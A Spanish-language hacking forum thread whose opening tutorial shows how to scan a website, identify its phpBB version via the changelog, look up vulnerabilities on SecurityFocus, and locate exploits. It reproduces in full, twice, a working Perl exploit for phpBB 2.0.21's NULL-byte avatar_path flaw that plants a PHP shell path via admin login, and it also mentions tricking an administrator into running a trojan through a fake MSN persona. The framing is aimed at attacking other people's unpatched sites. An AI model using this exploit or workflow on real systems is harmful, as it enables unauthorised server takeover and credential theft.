Nuevas NORMAS para el foro
Bienvenido(a),
Visitante
. Favor de
ingresar
o
registrarse
.
¿Perdiste tu
email de activación?
- Agosto 21, 2008, 03:40:28
Boton Buscar
Visita:
Articulos
-
Juegos Gratis
-
Da Foros
Comunidad Underground Hispana
|
Phreaking, Hacking y Seguridad
|
Bug y Exploits
(Moderador:
OzX
) | Tema:
Tutorial Securityfocus : Buscando informacion sobre las Vulnerabilidades
0 Usuarios y 1 Visitante están viendo este tema.
« anterior
próximo »
Páginas:
[
1
]
Autor
Tema: Tutorial Securityfocus : Buscando informacion sobre las Vulnerabilidades (Leído 2106 veces)
OzX
Moderadores
Gran Colaborador
Desconectado
Mensajes: 2061
foro.new-bytes.net
Tutorial Securityfocus : Buscando informacion sobre las Vulnerabilidades
«
en:
Mayo 31, 2007, 10:09:46 »
- Tutorial Creado para New-Bytes.net
- En este Tutorial Explicare la forma mas facil de encontrar informacion sobre las vulnerabilidades de las distintas aplicaciones que se encuentran en una pagina web, no intenta de ser una guia paso a paso, pero si un buen referente para que luego exploten sus propios metodos de investigacion, y principalmente leer , para evitar preguntas sin sentidos.
Oz ¡
Ahy varias formas de auditar una pagina web, si no es via "host" escaneando sus puertos y examinando que Servicios Tienen corriendo, (ftp, http, etc):
Código:
nmap -v -sSV -P0
Tambien se puede hacer una "escanear" manual, buscando los Scripts que ocupan, foros, blogs, sistemas de noticias, etc..
[alerta] Un aspecto esencial es ver de que version es.
Este Ejemplo es en los foros PHPBB
Código:
http://<server>/[path]/docs/CHANGELOG.html
Le agregamos una Version mas, por ejemplo si Sale 2.0.20 , es 2.0.21, porque ahy explica los cambios que se s creado en la version anterior 2.0.20 pero en esta "version" 2.0.21 todavia no lo corrigen, o mejor dicho el administrador no actualiza el script
En una forma bastante eficaz, porque muchos de estos scripts son bastante vulnerables , RFI, SQL, XSS entre otros.
La ventaja es que estas vulnerabilidades se pueden explotar directamente desde el navegador, pero siempre existen programas que facilitan este procedimiento, creando script en perl, php, etc, para solo introducir los datos y este aprovecha la vulnerabilidad.
[ide-bombilla] Antes de avanzar quiero aclarar algo:
Vulnerabilidad
= Fallo en el sistema, para que cualquier usuarios mal "intencionado" pueda ejecutar codigos arbitrarios en el sistema victima
Exploit
= Codigo
(compilado, interpretado)
,o
Accion
que aprovecha una vulnerabilidad, para tener privilegios en el sistema.
¿A que me refiero con Accion?
Que no necesariamente tiene que ser un Exploit escrito en Perl que se tenga que interpretar , si no tambien una simple inyeccion sql , rfi, xss, es un exploit. Codigos directamente incrustados desde el navegador, muchos users creen que el "Exploit" tiene que ser un programa que se tiene que compilar o interpretar, pero esto no es asi. Puede ser cualquier codigo, o incluso puede ser hasta ing social
Hacerce pasar por chica en msn y enviarle un troyano al administrador para averiguar la password de su sitio sigue siendo parte de un Exploit. Pero no es ni un Codigo ni Nada
"Human Exploit"
No e Escuchado a nadie Hacer termino a "Human Exploit" como parte de un tipo de Exploit mas, pero intento que si se haga XD¡. para hacer referencia a la Ing social como parte de un Exploit (que aprovecha una vulnerabilidad)
Una ves Vista la Version del Script, En este caso el Foro PHPBB, Talves nos surgan las siguientes dudas:
¿Que tenemos que Hacer Ahora?
Citar
R: Ir algun Bugtrag y Buscar si Existen alguna Vulnerabilidad
¿Donde la Encuentro?
Citar
www.Securityfocus.com
¿Estara Listo?
Citar
Si existe alguna vulnerabilidad, existira alguna explicacion, pero no necesariamente existira algun tipo de exploit
¿Tendre que Leer?
Citar
Si no te gusta leer no sigas leyendo
[alerta] Buscando en la Enciclopedia de las Vulnerabilidad:
Ingresamos a
www.Securityfocus.com
Ingresamos a
Vulnerabilities
En
Vendor
Selecionamos el Nombre del Script, en este caso PHPBB
y Buscamos su
Version
Algunas Veces nos nos encontraremos con Ninguna Vulnerabilidad.
Una vez Encontrada la Version, Podremos visualizar las Vulnerabilidades, ahora devemos ingresar a los Link expuestos para poder averiguar
¿Que tipo de Vulnerabilidad Tiene?
y asi Poder seguir buscando.
Para Cada vulnerabilidad tenemos que leer su descripcion, ahora el ingles no es una dificultar ¿puedes leer? ¿Sabes Ocupar Google? .
Citar
El Script PHPBB esta suseptible a la ejecucion de codigos php arbitrarios, los atacantes puedes tener privilegios sobre el servidor en donde se aloja la pagina web
Ingresamos a la Pestaña Exploit:
Citar
Los atacantes puedes Explotar esta vulnerabilidad por el navegador
[alerta] Ahora ya tenemos mas informacion sobre las vulnerabilidad, es importante leer cada una de ellas, para asi tener una mayor posibilidad para poder encontrar algun Exploit.
En lo Personal Si quiero Buscar algun Exploit Parto Obviamente por el titulo:
Google
Citar
"phpBB Avatar_Path PHP Code Execution Vulnerability"exploit
Claramento
aunque no en todos los casos
, nos devolvera los link de securityfocus al inicio, pero ahy otras webs de seguridad , en donde dan como noticia la misma vulnerabilidad, en algunos casos estos sitios exponen links directos hacia los exploits, o como tambien en muchos casos que no.
Pero tambien si analizamos un poco mas, podriamos buscar por el autor , quien descubrio la Vulnerabilidad, mas otras palabras claves:
[ide-bombilla] Como ven nos Tira un Link hacia Milw0rm donde claramente ahy un Exploit.
http://www.milw0rm.com/exploits/2348
Código:
#!/usr/bin/perl -w
# Author: ShAnKaR
# Title: multiple PHP application poison NULL byte vulnerability
# Applications: phpBB 2.0.21, punBB 1.2.12
# Threat Level: Critical
# Original advisory (in Russian): http://www.security.nnov.ru/Odocument221.html
#
# Poison NULL byte vulnerability for perl CGI applications was described
# in [1]. ShAnKaR noted, that same vulnerability also affects different
# PHP applications. An example of vulnerable applications are phpBB and
# punBB.
#
# Vulnerability can be used to upload or replace arbitrary files on
# server, e.g. PHP scripts, by adding "poison NULL" (%00) to filename.
#
# In case of phpBB and punBB vulnerability can be exploited by changing
# location of avatar file and uploading avatar file with PHP code in EXIF
# data.
#
# A PoC exploit to change Avatar file location for phpBB:
#
#
use HTTP::Cookies;
use LWP;
use URI::Escape;
unless( @ARGV){die "USE:\n./phpbb.pl localhost.com/forum/ admin pass images/avatars/shell.php [d(DEBUG)]\n"}
my $ua = LWP::UserAgent->new(agent=>'Mozilla/4.0 (compatible; Windows 5.1)');
$ua->cookie_jar( HTTP::Cookies->new());
$url='http://'.$ARGV[0].'/login.php';
$data="username=".$ARGV[1]."&password=".$ARGV[2]."&login=1";
my $req = new HTTP::Request 'POST',$url;
$req->content_type('application/x-www-form-urlencoded');
$req->content($data);
my $res = $ua->request($req);
$res=$ua->get('http://'.$ARGV[0].'/login.php');
$content=$res->content;
$content=~ m/true&sid=([^"]+)"/g;
if($ARGV[4]){
$content=$res->content;
print $content;
}
$url='http://'.$ARGV[0].'/login.php';
$data="username=".$ARGV[1]."&password=".$ARGV[2]."&login=1&admin=1";
$req = new HTTP::Request 'POST',$url;
$req->content_type('application/x-www-form-urlencoded');
$req->content($data);
$res = $ua->request($req);
$url='http://'.$ARGV[0].'/admin/admin_board.php?sid='.$1;
$data="submit=submit&allow_avatar_local=1&avatar_path=".$ARGV[3]."%00";
$req = new HTTP::Request 'POST',$url;
$req->content_type('application/x-www-form-urlencoded');
$req->content($data);
$res = $ua->request($req);
if($ARGV[4]){
$content=$res->content;
print $content;
}
# milw0rm.com [2006-09-11]
[alerta] Eso era con 1 sola Vulnerabilidad, ahora expondre los Link de las otras vulnerabilidad que encontro Securityfocus en su Base de datos:
phpBB Privmsg.PHP HTML Injection Vulnerability
Nivisec Admin Topic Action Logging Module Remote File Include Vulnerability
Securitfocus nos ayuda bastante para empezar , a buscar las vulnerabilidades, asi podremos ir cada vez avanzado, pero ya teniendo una Guia.
[alerta] Para Entender ahy que leer sobre los distintos tipos de Vulnerabilidad, no sacamos nada, con encontrar el exploit, si no sabemos que es lo que hace, es por ello que es necesario leer sobre las "nociones basicas" de las distintas vulnerabilidades, y asi tambien algun lenguaje de programacion, si no hacen esto, existiran preguntas talves como:
¿Que hago Ahora?
Lo Compilo y no Sale nada¡
¿Que es Exploit?
Ahy una buena base de informacion en el Foro de Vulnerabildiades de
new-bytes.net
[alerta] LEEER¡ NO EVITAR LA FLOJERA MENTAL ¡¡¡ AHY QUE LEER¡' PARA SABER¡¡¡
Creo que es una Duda bastante recurrente y bueno , es bueno resolver una duda mas aunque sea pequeña .
Oz
www.new-Bytes.net
Si van a Copiar Exponer de donde lo sacaron, y quien es el autor.
- Tutorial Creado para New-Bytes.net
«
Última modificación: Junio 19, 2008, 06:02:18 por ManCuerTex (ViPeR)
»
En línea
http://foro.new-bytes.net
OzX
Moderadores
Gran Colaborador
Desconectado
Mensajes: 2061
foro.new-bytes.net
Re: Tutorial Securityfocus : Buscando informacion sobre las Vulnerabilidades
«
Respuesta #1 en:
Junio 01, 2007, 01:35:58 »
Cita de: L0ukh4ck5 en Mayo 31, 2007, 10:32:03
Esta muy bueno Salu2 tu siempre aportando
jeje thanx bro XD¡.
«
Última modificación: Junio 19, 2008, 06:02:41 por ManCuerTex (ViPeR)
»
En línea
http://foro.new-bytes.net
SeNeGe
Visitante
Re: Tutorial Securityfocus : Buscando informacion sobre las Vulnerabilidades
«
Respuesta #2 en:
Junio 01, 2007, 06:31:05 »
hola bueno siempre digo que no importa que tanta info tenga si no como se explica muy bueno.
salu2
SNG
En línea
invisible_hack
Miembro
Desconectado
Mensajes: 74
Mixer v1.0 - Genera passwords seguras con 1 click
Re: Tutorial Securityfocus : Buscando informacion sobre las Vulnerabilidades
«
Respuesta #3 en:
Julio 05, 2007, 04:49:39 »
Es weno!!
Saludos!!
En línea
-_-_-_
www.invisiblehack.foro.st
-_-_-_
¡¡Regístrate!!
ElPerro
Gran Colaborador
Desconectado
Mensajes: 1249
ElPerro - ElPlog.com
Re: Tutorial Securityfocus : Buscando informacion sobre las Vulnerabilidades
«
Respuesta #4 en:
Julio 05, 2007, 04:30:25 »
En línea
OzX
Moderadores
Gran Colaborador
Desconectado
Mensajes: 2061
foro.new-bytes.net
Re: Tutorial Securityfocus : Buscando informacion sobre las Vulnerabilidades
«
Respuesta #5 en:
Julio 10, 2007, 04:39:20 »
jejej thanx bro :=)
En línea
http://foro.new-bytes.net
ek_col
Visitante
Re: Tutorial Securityfocus : Buscando informacion sobre las Vulnerabilidades
«
Respuesta #6 en:
Agosto 13, 2007, 11:16:09 »
Muy bueno y lo mejor ,,,,era lo que estaba buscado....
Gracias
En línea
.bAcKdOoR.
Recien Llegado
Desconectado
Mensajes: 5
Re: Tutorial Securityfocus : Buscando informacion sobre las Vulnerabilidades
«
Respuesta #7 en:
Enero 11, 2008, 07:52:30 »
jejeje
saludos perrin!
a la vuelta leo.. ya le heche un ojo ala rapida!
Saludos =)
En línea
Chile =)
WaNlOx
Recien Llegado
Desconectado
Mensajes: 9
la sabiduria es vida
Re: Tutorial Securityfocus : Buscando informacion sobre las Vulnerabilidades
«
Respuesta #8 en:
Abril 09, 2008, 07:56:43 »
que paso con este post?¿?
En línea
©©
Moderación
Gran Colaborador
Desconectado
Mensajes: 2325
Goku
Re: Tutorial Securityfocus : Buscando informacion sobre las Vulnerabilidades
«
Respuesta #9 en:
Abril 09, 2008, 09:52:36 »
Cita de: WaNlOx en Abril 09, 2008, 07:56:43
que paso con este post?¿?
Dañado bro...Enviale un IM a un global o a ozX para ver si lo pueden areglar
SALudos
TH3 ziX
En línea
Antiguamente era de zix
℮0F-R00t [ Vacaciones ]
Gran Colaborador
Conectado
Mensajes: 2388
EndOfFile................. CodeBuser..............
Re: Tutorial Securityfocus : Buscando informacion sobre las Vulnerabilidades
«
Respuesta #10 en:
Abril 09, 2008, 09:53:56 »
si te urge prisa busca en los caches de google
saludos
En línea
NORMAS DEL FORO
Acunetix Web Vulnerability
|
NOD32 ESET Smart Security 3.0.650 Full
|
KIS6 & KIS7 [ de por vida ]
Tutorial Remote File Inclusion ( RFI )
|
Evitando SQL Injection
La imaginacion es lo mas poderoso que ha conocido el ser humano
TerminalHacker.net
LatinoHack.com
drago5n
Habitual
Desconectado
Mensajes: 249
Re: Tutorial Securityfocus : Buscando informacion sobre las Vulnerabilidades
«
Respuesta #11 en:
Abril 10, 2008, 02:27:04 »
oigan sera que no pueden volver a poner la info
grasias
salu2
En línea
©©
Moderación
Gran Colaborador
Desconectado
Mensajes: 2325
Goku
Re: Tutorial Securityfocus : Buscando informacion sobre las Vulnerabilidades
«
Respuesta #12 en:
Abril 10, 2008, 02:32:40 »
Bueno debido a que el moderador casi nose conecta ahora le mando un IM a zolo aver si puede areglar el post
Th3 ziX
En línea
Antiguamente era de zix
OzX
Moderadores
Gran Colaborador
Desconectado
Mensajes: 2061
foro.new-bytes.net
Re: Tutorial Securityfocus : Buscando informacion sobre las Vulnerabilidades
«
Respuesta #13 en:
Abril 12, 2008, 10:56:27 »
si me conecto
¬¬...
ni idea que le abra pasado al post..
si no lo encuentro nuevamente en otros foros lo borro.
saludos¡
En línea
http://foro.new-bytes.net
R/Q
Miembro
Desconectado
Mensajes: 25
Re: Tutorial Securityfocus : Buscando informacion sobre las Vulnerabilidades
«
Respuesta #14 en:
Mayo 22, 2008, 04:33:53 »
donde esta donde?? donde? el tutorial que no lo veo..
En línea
"ignorante no es aquel que no sabe, es aquel que sabiendo no enseña"
Flori4n
Recien Llegado
Desconectado
Mensajes: 2
Re: Tutorial Securityfocus : Buscando informacion sobre las Vulnerabilidades
«
Respuesta #15 en:
Junio 18, 2008, 07:25:09 »
Where's the link ? text
En línea
©©
Moderación
Gran Colaborador
Desconectado
Mensajes: 2325
Goku
Re: Tutorial Securityfocus : Buscando informacion sobre las Vulnerabilidades
«
Respuesta #16 en:
Junio 18, 2008, 11:37:54 »
Este es el Tuto:
Cita de: OzX en Mayo 31, 2007, 10:09:46
- Tutorial Creado para New-Bytes.net
- En este Tutorial Explicare la forma mas facil de encontrar informacion sobre las vulnerabilidades de las distintas aplicaciones que se encuentran en una pagina web, no intenta de ser una guia paso a paso, pero si un buen referente para que luego exploten sus propios metodos de investigacion, y principalmente leer , para evitar preguntas sin sentidos.
Oz ¡
Ahy varias formas de auditar una pagina web, si no es via "host" escaneando sus puertos y examinando que Servicios Tienen corriendo, (ftp, http, etc):
Código:
nmap -v -sSV -P0
Tambien se puede hacer una "escanear" manual, buscando los Scripts que ocupan, foros, blogs, sistemas de noticias, etc..
[alerta] Un aspecto esencial es ver de que version es.
Este Ejemplo es en los foros PHPBB
Código:
http://<server>/[path]/docs/CHANGELOG.html
Le agregamos una Version mas, por ejemplo si Sale 2.0.20 , es 2.0.21, porque ahy explica los cambios que se s creado en la version anterior 2.0.20 pero en esta "version" 2.0.21 todavia no lo corrigen, o mejor dicho el administrador no actualiza el script
En una forma bastante eficaz, porque muchos de estos scripts son bastante vulnerables , RFI, SQL, XSS entre otros.
La ventaja es que estas vulnerabilidades se pueden explotar directamente desde el navegador, pero siempre existen programas que facilitan este procedimiento, creando script en perl, php, etc, para solo introducir los datos y este aprovecha la vulnerabilidad.
[ide-bombilla] Antes de avanzar quiero aclarar algo:
Vulnerabilidad
= Fallo en el sistema, para que cualquier usuarios mal "intencionado" pueda ejecutar codigos arbitrarios en el sistema victima
Exploit
= Codigo
(compilado, interpretado)
,o
Accion
que aprovecha una vulnerabilidad, para tener privilegios en el sistema.
¿A que me refiero con Accion?
Que no necesariamente tiene que ser un Exploit escrito en Perl que se tenga que interpretar , si no tambien una simple inyeccion sql , rfi, xss, es un exploit. Codigos directamente incrustados desde el navegador, muchos users creen que el "Exploit" tiene que ser un programa que se tiene que compilar o interpretar, pero esto no es asi. Puede ser cualquier codigo, o incluso puede ser hasta ing social
Hacerce pasar por chica en msn y enviarle un troyano al administrador para averiguar la password de su sitio sigue siendo parte de un Exploit. Pero no es ni un Codigo ni Nada
"Human Exploit"
No e Escuchado a nadie Hacer termino a "Human Exploit" como parte de un tipo de Exploit mas, pero intento que si se haga XD¡. para hacer referencia a la Ing social como parte de un Exploit (que aprovecha una vulnerabilidad)
Una ves Vista la Version del Script, En este caso el Foro PHPBB, Talves nos surgan las siguientes dudas:
¿Que tenemos que Hacer Ahora?
Citar
R: Ir algun Bugtrag y Buscar si Existen alguna Vulnerabilidad
¿Donde la Encuentro?
Citar
www.Securityfocus.com
¿Estara Listo?
Citar
Si existe alguna vulnerabilidad, existira alguna explicacion, pero no necesariamente existira algun tipo de exploit
¿Tendre que Leer?
Citar
Si no te gusta leer no sigas leyendo
[alerta] Buscando en la Enciclopedia de las Vulnerabilidad:
Ingresamos a
www.Securityfocus.com
Ingresamos a
Vulnerabilities
En
Vendor
Selecionamos el Nombre del Script, en este caso PHPBB
y Buscamos su
Version
Algunas Veces nos nos encontraremos con Ninguna Vulnerabilidad.
Una vez Encontrada la Version, Podremos visualizar las Vulnerabilidades, ahora devemos ingresar a los Link expuestos para poder averiguar
¿Que tipo de Vulnerabilidad Tiene?
y asi Poder seguir buscando.
Para Cada vulnerabilidad tenemos que leer su descripcion, ahora el ingles no es una dificultar ¿puedes leer? ¿Sabes Ocupar Google? .
Citar
El Script PHPBB esta suseptible a la ejecucion de codigos php arbitrarios, los atacantes puedes tener privilegios sobre el servidor en donde se aloja la pagina web
Ingresamos a la Pestaña Exploit:
Citar
Los atacantes puedes Explotar esta vulnerabilidad por el navegador
[alerta] Ahora ya tenemos mas informacion sobre las vulnerabilidad, es importante leer cada una de ellas, para asi tener una mayor posibilidad para poder encontrar algun Exploit.
En lo Personal Si quiero Buscar algun Exploit Parto Obviamente por el titulo:
Google
Citar
"phpBB Avatar_Path PHP Code Execution Vulnerability"exploit
Claramento
aunque no en todos los casos
, nos devolvera los link de securityfocus al inicio, pero ahy otras webs de seguridad , en donde dan como noticia la misma vulnerabilidad, en algunos casos estos sitios exponen links directos hacia los exploits, o como tambien en muchos casos que no.
Pero tambien si analizamos un poco mas, podriamos buscar por el autor , quien descubrio la Vulnerabilidad, mas otras palabras claves:
[ide-bombilla] Como ven nos Tira un Link hacia Milw0rm donde claramente ahy un Exploit.
http://www.milw0rm.com/exploits/2348
Código:
#!/usr/bin/perl -w
# Author: ShAnKaR
# Title: multiple PHP application poison NULL byte vulnerability
# Applications: phpBB 2.0.21, punBB 1.2.12
# Threat Level: Critical
# Original advisory (in Russian): http://www.security.nnov.ru/Odocument221.html
#
# Poison NULL byte vulnerability for perl CGI applications was described
# in [1]. ShAnKaR noted, that same vulnerability also affects different
# PHP applications. An example of vulnerable applications are phpBB and
# punBB.
#
# Vulnerability can be used to upload or replace arbitrary files on
# server, e.g. PHP scripts, by adding "poison NULL" (%00) to filename.
#
# In case of phpBB and punBB vulnerability can be exploited by changing
# location of avatar file and uploading avatar file with PHP code in EXIF
# data.
#
# A PoC exploit to change Avatar file location for phpBB:
#
#
use HTTP::Cookies;
use LWP;
use URI::Escape;
unless( @ARGV){die "USE:\n./phpbb.pl localhost.com/forum/ admin pass images/avatars/shell.php [d(DEBUG)]\n"}
my $ua = LWP::UserAgent->new(agent=>'Mozilla/4.0 (compatible; Windows 5.1)');
$ua->cookie_jar( HTTP::Cookies->new());
$url='http://'.$ARGV[0].'/login.php';
$data="username=".$ARGV[1]."&password=".$ARGV[2]."&login=1";
my $req = new HTTP::Request 'POST',$url;
$req->content_type('application/x-www-form-urlencoded');
$req->content($data);
my $res = $ua->request($req);
$res=$ua->get('http://'.$ARGV[0].'/login.php');
$content=$res->content;
$content=~ m/true&sid=([^"]+)"/g;
if($ARGV[4]){
$content=$res->content;
print $content;
}
$url='http://'.$ARGV[0].'/login.php';
$data="username=".$ARGV[1]."&password=".$ARGV[2]."&login=1&admin=1";
$req = new HTTP::Request 'POST',$url;
$req->content_type('application/x-www-form-urlencoded');
$req->content($data);
$res = $ua->request($req);
$url='http://'.$ARGV[0].'/admin/admin_board.php?sid='.$1;
$data="submit=submit&allow_avatar_local=1&avatar_path=".$ARGV[3]."%00";
$req = new HTTP::Request 'POST',$url;
$req->content_type('application/x-www-form-urlencoded');
$req->content($data);
$res = $ua->request($req);
if($ARGV[4]){
$content=$res->content;
print $content;
}
# milw0rm.com [2006-09-11]
[alerta] Eso era con 1 sola Vulnerabilidad, ahora expondre los Link de las otras vulnerabilidad que encontro Securityfocus en su Base de datos:
phpBB Privmsg.PHP HTML Injection Vulnerability
Nivisec Admin Topic Action Logging Module Remote File Include Vulnerability
Securitfocus nos ayuda bastante para empezar , a buscar las vulnerabilidades, asi podremos ir cada vez avanzado, pero ya teniendo una Guia.
[alerta] Para Entender ahy que leer sobre los distintos tipos de Vulnerabilidad, no sacamos nada, con encontrar el exploit, si no sabemos que es lo que hace, es por ello que es necesario leer sobre las "nociones basicas" de las distintas vulnerabilidades, y asi tambien algun lenguaje de programacion, si no hacen esto, existiran preguntas talves como:
¿Que hago Ahora?
Lo Compilo y no Sale nada¡
¿Que es Exploit?
Ahy una buena base de informacion en el Foro de Vulnerabildiades de
new-bytes.net
[alerta] LEEER¡ NO EVITAR LA FLOJERA MENTAL ¡¡¡ AHY QUE LEER¡' PARA SABER¡¡¡
Creo que es una Duda bastante recurrente y bueno , es bueno resolver una duda mas aunque sea pequeña .
Oz
www.new-Bytes.net
Si van a Copiar Exponer de donde lo sacaron, y quien es el autor.
- Tutorial Creado para New-Bytes.net
En línea
Antiguamente era de zix
OzX
Moderadores
Gran Colaborador
Desconectado
Mensajes: 2061
foro.new-bytes.net
Re: Tutorial Securityfocus : Buscando informacion sobre las Vulnerabilidades
«
Respuesta #17 en:
Junio 19, 2008, 04:45:26 »
¿? Las img no em cargan, chekeare.
En línea
http://foro.new-bytes.net
Black_Jack21
Recien Llegado
Desconectado
Mensajes: 15
H4ck 15 5h4r3 1nf0rm4t10n
Re: Tutorial Securityfocus : Buscando informacion sobre las Vulnerabilidades
«
Respuesta #18 en:
Junio 20, 2008, 09:19:50 »
exelete tuto
En línea
xkanonx
Recien Llegado
Desconectado
Mensajes: 1
Re: Tutorial Securityfocus : Buscando informacion sobre las Vulnerabilidades
«
Respuesta #19 en:
Julio 06, 2008, 02:32:40 »
Saluoos weon buen aporte....
En línea
Vock
Recien Llegado
Desconectado
Mensajes: 14
Re: Tutorial Securityfocus : Buscando informacion sobre las Vulnerabilidades
«
Respuesta #20 en:
Agosto 16, 2008, 07:51:02 »
OzX Muy bueno te felicito por el aporte
Gracias por darnos la opcion de aprender mucho mas cada dia
Un abrazo OzX y a todos ellos que hacen posible que nuestra cultura vaya más y más lejos
Un abrazo a todos
PD.: OzX Espero con impaciensia la levantada de new-bytes
«
Última modificación: Agosto 16, 2008, 07:53:34 por Vock
»
En línea
NorK
Moderación
Habitual
Desconectado
Mensajes: 261
Respeto al sabio por sabiduria o por torpeza.
Re: Tutorial Securityfocus : Buscando informacion sobre las Vulnerabilidades
«
Respuesta #21 en:
Agosto 16, 2008, 08:17:37 »
New-bytes como nombré ya creo que dejará de existir. Hemos cambiado de nombre y de "cara" dado que ya no se hará un foro si no un blog donde iremos dejando nuestros papers.
Cosas buenas de hacer esto?
El staff tendrá mucho mas tiempo para leer y dedicarse verdaderamente al hacking ya que no tendrá que estar continuamente mirando los logs e ir checkeando que todo este correcto.
Así que los artículos que publiquemos tendrán mas tiempo de elaboración por lo que serán de mejor calidad (o esa es la idea)
S4ludos!
En línea
OzX
Moderadores
Gran Colaborador
Desconectado
Mensajes: 2061
foro.new-bytes.net
Re: Tutorial Securityfocus : Buscando informacion sobre las Vulnerabilidades
«
Respuesta #22 en:
Agosto 17, 2008, 02:38:02 »
Cita de: NorK en Agosto 16, 2008, 08:17:37
New-bytes como nombré ya creo que dejará de existir. Hemos cambiado de nombre y de "cara" dado que ya no se hará un foro si no un blog donde iremos dejando nuestros papers.
Cosas buenas de hacer esto?
El staff tendrá mucho mas tiempo para leer y dedicarse verdaderamente al hacking ya que no tendrá que estar continuamente mirando los logs e ir checkeando que todo este correcto.
Así que los artículos que publiquemos tendrán mas tiempo de elaboración por lo que serán de mejor calidad (o esa es la idea)
S4ludos!
Esacto¡
Saludos Brota¡
En línea
http://foro.new-bytes.net
UnknownShadow
Miembro
Desconectado
Mensajes: 44
Aprendiz de hacker
Re: Tutorial Securityfocus : Buscando informacion sobre las Vulnerabilidades
«
Respuesta #23 en:
Ayer
a las 04:41:06 »
está muy bueno, gracias por ponerlo en el foro
En línea
Me considero una aprendiz de hacker se que en un futuro si me esfuerzo voy a ser una hacker, pero ese futuro por ahora es muy lejano
CiberTron
Habitual
Desconectado
Mensajes: 185
la vida es corta hay que aprender de sus arrores
Re: Tutorial Securityfocus : Buscando informacion sobre las Vulnerabilidades
«
Respuesta #24 en:
Ayer
a las 05:03:43 »
no revivan post viejos por los admin o moderadores se van enojar
En línea
by Alekiu
Páginas:
[
1
]
Comunidad Underground Hispana
|
Phreaking, Hacking y Seguridad
|
Bug y Exploits
(Moderador:
OzX
) | Tema:
Tutorial Securityfocus : Buscando informacion sobre las Vulnerabilidades
« anterior
próximo »
Ir a:
Por favor selecciona un destino:
-----------------------------
Foros De Consulta General
-----------------------------
=> Novedades
=> Dudas, Comentarios Y Sugerencias
=> Top 100
=> Off-Topic
=> Revista E-Zine
===> Noticias
-----------------------------
Phreaking, Hacking y Seguridad
-----------------------------
=> HacK GeneraL
===> Ingenieria Inversa
===> Encriptacion, Cryptografia
===> TV HACK
===> Seguridad
===> Cursos y Ezines
=====> Trucos Internet
=====> Textos Hacking
===> Defacing
=> Phreaking
===> Moviles
=> Bug y Exploits
-----------------------------
Hack Novato
--------------